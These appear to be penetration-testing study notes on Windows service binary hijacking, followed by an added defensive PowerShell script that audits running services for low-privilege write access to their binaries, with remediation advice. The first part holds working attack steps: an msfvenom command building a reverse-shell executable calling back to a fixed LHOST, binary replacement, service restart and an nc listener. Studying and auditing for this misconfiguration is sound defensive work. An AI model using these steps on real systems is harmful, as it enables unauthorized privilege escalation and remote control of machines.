Service Binary hijacking
- Check the programs run by scheduled tasks and by running services
  - schtasks /query /fo LIST /v
  - Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
- Check the permissions (Full control or Write) on each program found
  - icacls <full-path>
  - icacls C:\Users\steve\Pictures\BackendCacheCleanup.exe
- Transfer an adduser.exe executable and rename it to the name of the exploitable exe
  - OR msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.126 LPORT=139 -f exe > httpd.exe
- Restart the service so it loads the replaced binary
  - sc.exe stop <service-name>
  - sc.exe start <service-name>
- nc -nvlp 139 if a reverse shell exe is used
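Defender-side check for the same misconfiguration, added here and not part of the original notes: it automates the service enumeration and icacls steps above and reports running services whose binary grants Write, Modify or Full control to low-privilege principals. Assumes it runs as a local administrator; the principal list and the path-parsing helper are my own choices, not a built-in.

```powershell
# Added audit example: flag running services whose binary is writable by
# low-privilege principals (the condition service binary hijacking relies on).
# Assumption: run as an administrator so every ACL is readable.

$lowPriv = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
$writeMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
             [System.Security.AccessControl.FileSystemRights]::Modify -bor
             [System.Security.AccessControl.FileSystemRights]::FullControl -bor
             [System.Security.AccessControl.FileSystemRights]::TakeOwnership

function Get-ServiceBinaryPath {
    # Extract the executable from a Win32_Service.PathName (quoted or unquoted, with args)
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    if ($PathName.StartsWith('"')) {
        $end = $PathName.IndexOf('"', 1)
        if ($end -gt 1) { return $PathName.Substring(1, $end - 1) }
        return $null
    }
    # Unquoted: grow the prefix token by token until it names an existing .exe
    $tokens = $PathName -split ' '
    for ($i = 1; $i -le $tokens.Count; $i++) {
        $candidate = $tokens[0..($i - 1)] -join ' '
        if ($candidate -match '\.exe$' -and (Test-Path -LiteralPath $candidate)) { return $candidate }
    }
    return $tokens[0]
}

function Test-WritableByLowPriv {
    # True if any Allow ACE for a low-privilege principal carries a write-class right
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    $acl = Get-Acl -LiteralPath $Path
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($lowPriv -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $writeMask) -ne 0) { return $true }
    }
    return $false
}

Get-CimInstance -ClassName Win32_Service |
    Where-Object { $_.State -eq 'Running' } |
    ForEach-Object {
        $bin = Get-ServiceBinaryPath $_.PathName
        if ($bin -and (Test-WritableByLowPriv $bin)) {
            [pscustomobject]@{ Service = $_.Name; RunsAs = $_.StartName; Binary = $bin }
        }
    } | Format-Table -AutoSize
```

Each finding is fixed by removing the write ACE from the binary (for example `icacls <full-path> /remove:g "BUILTIN\Users"`) and, where the service runs as LocalSystem, moving the binary out of a user-writable directory.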